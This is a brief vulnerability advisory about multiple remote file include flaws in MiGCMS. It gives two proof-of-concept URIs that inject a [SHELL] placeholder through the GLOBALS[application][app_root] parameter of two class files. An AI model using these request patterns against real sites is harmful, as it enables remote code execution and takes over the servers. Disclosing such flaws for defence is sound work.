MiGCMS Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues using a browser. The following proof-of-concept URIs are available: http://www.example.com/path/lib/obj/collection.class.php?GLOBALS[application][app_root]=[SHELL] http://www.example.com/path/lib/obj/content_image.class.php?GLOBALS[application][app_root]=[SHELL] |
Privacy Statement |